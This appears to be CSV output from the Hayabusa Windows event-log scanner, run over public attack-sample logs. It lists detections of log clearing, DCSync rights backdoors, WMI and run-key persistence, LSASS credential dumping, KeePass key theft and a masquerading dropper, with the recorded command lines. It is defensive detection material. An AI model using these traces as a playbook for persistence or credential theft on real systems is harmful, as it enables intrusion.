2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe  :  Path: C:\Windows\System32\wlms\wlms.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding  :  Path: C:\Windows\System32\wbem\unsecapp.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg *  ""hello from run key""  :  Path: C:\Windows\System32\cmd.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe""   :  Path: C:\Windows\PSEXESVC.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg  *  ""hello from run key""  :  Path: C:\Windows\System32\msg.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg *  ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc""   :  Path: C:\Windows\System32\mmc.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe""   :  Path: C:\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe""  :  Path: C:\Program Files\Windows Media Player\wmpnetwk.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,System log file was cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx
2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx
2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx
2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\user01\Desktop\WMIGhost.exe""   :  Path: C:\Users\user01\Desktop\WMIGhost.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\scrcons.exe -Embedding  :  Path: C:\Windows\System32\wbem\scrcons.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe  :  Path: C:\Windows\Sysmon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding  :  Path: C:\Windows\System32\wbem\unsecapp.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:44.045 +09:00,IEWIN7,1,informational,Process Creation,"Command: sysmon  -c sysmonconfig-18-apr-2019.xml  :  Path: C:\Users\IEUser\Desktop\Sysmon.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell  :  Command: Powershell  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery  :  Command: ""C:\Windows\system32\whoami.exe""  /user  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1088,technique_name=Bypass User Account Control  :  Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc""   :  Path: C:\Windows\System32\mmc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery  :  Command: ""C:\Windows\system32\whoami.exe""  /user  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading  :  Command: ""C:\Users\IEUser\Downloads\Flash_update.exe""   :  Path: C:\Users\IEUser\Downloads\Flash_update.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading  :  Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe""   :  Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: cmd.exe /A  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading  :  Command: KeeFarce.exe  :  Path: C:\Users\Public\KeeFarce.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx
2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,System log file was cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
2019-04-29 01:29:42.988 +09:00,IEWIN7,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Malicious Named Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:21.539 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
